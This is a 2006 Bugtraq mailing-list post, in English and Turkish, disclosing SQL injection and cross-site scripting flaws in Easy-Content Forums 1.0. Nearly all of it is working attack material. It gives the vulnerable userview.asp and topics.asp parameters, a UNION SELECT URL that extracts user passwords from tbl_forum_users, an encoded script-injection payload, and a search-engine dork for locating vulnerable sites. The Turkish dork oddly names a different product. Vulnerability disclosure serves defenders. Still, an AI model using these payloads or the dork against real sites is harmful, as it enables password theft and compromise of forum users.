Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




bugtraq logo Bugtraq mailing list archives

Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities
From: ajannhwt () hotmail com
Date: 23 May 2006 18:39:57 -0000

ENGLISH

# Title  :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

# Dork   :   "Copyright 2004 easy-content forums"

# Author :   ajann

# Exploit;

SQL INJECTİON--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=SQL TEXT

###  http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=xss TEXT

### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X


# ajann,Turkey


TURKISH

# Başlık          :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama]   :   "powered by phpmydirectory"
# Açığı Bulan     :   ajann
# Açık bulunan dosyalar;

SQL INJECTİON--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ

###  http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=Değişken

Örnek:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ

### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Örnek:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyarısı çıkarıcaktır.


Açıklama: 
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle sql sorgu 
çalıştırılabilmektedir.
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle xss kodları 
çalışabilmektedir.

# ajann,Turkiye


  By Date           By Thread  

Current thread:
  • Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities ajannhwt (May 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]